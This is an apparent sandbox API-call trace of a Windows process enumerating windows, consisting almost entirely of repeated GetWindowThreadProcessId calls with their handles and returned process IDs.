	[0557.936] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x13fc
	[0557.936] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xdc8
	[0557.936] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xc18
	[0557.937] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xc2c
	[0557.937] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xa1c
	[0557.937] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1244
	[0557.937] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xdb0
	[0557.937] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1398
	[0557.937] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1358
	[0557.937] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1370
	[0557.937] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1340
	[0557.938] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x130c
	[0557.938] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x12c0
	[0557.938] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x12e4
	[0557.938] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1270
	[0557.938] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1298
	[0557.938] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x120c
	[0557.938] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x122c
	[0557.938] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x11c4
	[0557.939] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x11b0
	[0557.939] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1188
	[0557.939] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1148
	[0557.939] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1160
	[0557.939] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x10fc
	[0557.939] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xe34
	[0557.939] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xea4
	[0557.940] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x514
	[0557.940] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xe48
	[0557.940] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xbc8
	[0557.940] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xdf8
	[0557.940] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x318
	[0557.940] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xcac
	[0557.940] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x8bc
	[0557.940] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xf9c
	[0557.941] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xf48
	[0557.941] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xe40
	[0557.941] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xecc
	[0557.941] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xeb8
	[0557.941] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xe80
	[0557.942] GetWindow (hWnd=0x10408, uCmd=0x4) returned 0x0
	[0557.943] IsWindowVisible (hWnd=0x10408) returned 0
	[0557.943] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xe98
	[0557.943] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xe60
	[0557.943] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xee4
	[0557.943] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xf00
	[0557.944] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xdf0
	[0557.944] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xe1c
	[0557.944] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xdd0
	[0557.944] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xd94
	[0557.944] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xd74
	[0557.944] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xd00
	[0557.944] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xcd8
	[0557.944] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xc84
	[0557.945] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xca4
	[0557.945] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xc64
	[0557.945] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xc24
	[0557.945] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xb84
	[0557.945] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xbac
	[0557.945] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x384
	[0557.945] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xab8
	[0557.946] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x33c
	[0557.946] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xa44
	[0557.946] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xa64
	[0557.946] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x8a8
	[0557.946] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xaf0
	[0557.946] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x88c
	[0557.946] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xb04
	[0557.947] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x910
	[0557.947] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x230
	[0557.947] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xac0
	[0557.947] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xab4
	[0557.947] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xaac
	[0557.947] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x3d0
	[0557.947] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x978
	[0557.947] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xa7c
	[0557.948] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x59c
	[0557.948] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xa88
	[0557.948] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xa6c
	[0557.948] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xa68
	[0557.948] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x9f8
	[0557.948] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xa04
	[0557.948] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x924
	[0557.949] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x8dc
	[0557.949] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x7dc
	[0557.949] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x768
	[0557.949] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x764
	[0557.949] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x820
	[0557.949] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x810
	[0557.949] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x794
	[0557.949] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x83c
	[0557.950] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x7ac
	[0557.950] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xb44
	[0557.950] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xb5c
	[0557.950] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x838
	[0557.950] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x4d0
	[0557.950] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x4d0
	[0557.950] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x4d0
	[0557.950] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x4d0
	[0557.951] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x4d0
	[0557.951] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x4d0
	[0557.951] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x4d0
	[0557.951] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x4d0
	[0557.951] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x818
	[0557.951] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x5b8
	[0557.951] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x494
	[0557.951] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1ec
	[0557.951] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x440
	[0557.952] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x7e8
	[0557.952] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x730
	[0557.952] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x2c8
	[0557.952] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x31c
	[0557.952] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x330
	[0557.952] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x128
	[0557.952] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x5c8
	[0557.952] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x6f8
	[0557.952] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x358
	[0557.952] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x73c
	[0557.953] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xb0
	[0557.953] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x250
	[0557.953] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x240
	[0557.953] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x790
	[0557.953] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x61c
	[0557.953] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x540
	[0557.953] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x538
	[0557.953] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x568
	[0557.957] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x538
	[0557.958] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x568
	[0557.958] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x538
	[0557.958] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x540
	[0557.958] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x540
	[0557.958] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x57c
	[0557.958] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x460
	[0559.965] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x554
	[0559.965] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x4d0
	[0559.965] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x528
	[0559.965] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x4d0
	[0559.966] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x4d0
	[0559.966] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x4d0
	[0559.966] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x79c
	[0559.966] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x4d0
	[0559.966] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x4e0
	[0559.966] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x4d0
	[0559.966] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x460
	[0559.966] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x460
	[0559.966] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x44c
	[0559.966] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x778
	[0559.967] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x460
	[0559.967] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x558
	[0559.967] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x4d0
	[0559.967] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x4d0
	[0559.967] GetWindowThreadProcessId (in: hWnd=0x108ba, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x14b4
	[0559.967] GetWindowThreadProcessId (in: hWnd=0x108b4, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x149c
	[0559.967] GetWindowThreadProcessId (in: hWnd=0x108ae, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x14a8
	[0559.967] GetWindowThreadProcessId (in: hWnd=0x108a2, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1490
	[0559.967] GetWindowThreadProcessId (in: hWnd=0x10890, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x14a4
	[0559.967] GetWindowThreadProcessId (in: hWnd=0x1087e, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x148c
	[0559.968] GetWindowThreadProcessId (in: hWnd=0x1084a, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1458
	[0559.968] GetWindowThreadProcessId (in: hWnd=0x10840, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1b4c
	[0559.968] GetWindowThreadProcessId (in: hWnd=0x20616, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1b3c
	[0559.968] GetWindowThreadProcessId (in: hWnd=0x10838, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x19bc
	[0559.968] GetWindowThreadProcessId (in: hWnd=0x10828, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x199c
	[0559.968] GetWindowThreadProcessId (in: hWnd=0x10824, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1998
	[0559.968] GetWindowThreadProcessId (in: hWnd=0x10820, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1994
	[0559.968] GetWindowThreadProcessId (in: hWnd=0x1081c, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1990
	[0559.968] GetWindowThreadProcessId (in: hWnd=0x10812, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1984
	[0559.968] GetWindowThreadProcessId (in: hWnd=0x1080c, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x197c
	[0559.969] GetWindowThreadProcessId (in: hWnd=0x10808, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1978
	[0559.969] GetWindowThreadProcessId (in: hWnd=0x107e4, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1824
	[0559.969] GetWindowThreadProcessId (in: hWnd=0x107d0, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1088
	[0559.969] GetWindowThreadProcessId (in: hWnd=0x107c4, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1908
	[0559.969] GetWindowThreadProcessId (in: hWnd=0x107b6, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x18cc
	[0559.969] GetWindowThreadProcessId (in: hWnd=0x1079c, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x18d0
	[0559.969] GetWindowThreadProcessId (in: hWnd=0x10792, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1840
	[0559.969] GetWindowThreadProcessId (in: hWnd=0x10780, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x10c4
	[0559.969] GetWindowThreadProcessId (in: hWnd=0x1077a, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x128c
	[0559.969] GetWindowThreadProcessId (in: hWnd=0x10776, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x16e8
	[0559.969] GetWindowThreadProcessId (in: hWnd=0x204a2, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x16cc
	[0559.970] GetWindowThreadProcessId (in: hWnd=0x10768, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x274
	[0559.970] GetWindowThreadProcessId (in: hWnd=0x10764, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x10e0
	[0559.970] GetWindowThreadProcessId (in: hWnd=0x10760, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x10cc
	[0559.970] GetWindowThreadProcessId (in: hWnd=0x1075c, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x10c0
	[0559.970] GetWindowThreadProcessId (in: hWnd=0x30750, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x10d0
	[0559.970] GetWindowThreadProcessId (in: hWnd=0x1072e, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1198
	[0559.970] GetWindowThreadProcessId (in: hWnd=0x10720, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1080
	[0559.970] GetWindowThreadProcessId (in: hWnd=0x10712, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1074
	[0559.970] GetWindowThreadProcessId (in: hWnd=0x10704, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x106c
	[0559.970] GetWindowThreadProcessId (in: hWnd=0x106cc, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1474
	[0559.971] GetWindowThreadProcessId (in: hWnd=0x106c8, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1414
	[0559.971] GetWindowThreadProcessId (in: hWnd=0x106c6, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xbd0
	[0559.971] GetWindowThreadProcessId (in: hWnd=0x106c2, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x550
	[0559.971] GetWindowThreadProcessId (in: hWnd=0x20370, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xa38
	[0559.971] GetWindowThreadProcessId (in: hWnd=0x202e8, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x16d0
	[0559.971] GetWindowThreadProcessId (in: hWnd=0x20338, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x16d4
	[0559.971] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x15bc
	[0559.971] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x15a0
	[0559.971] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x159c
	[0559.971] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1598
	[0559.972] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1594
	[0559.972] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1590
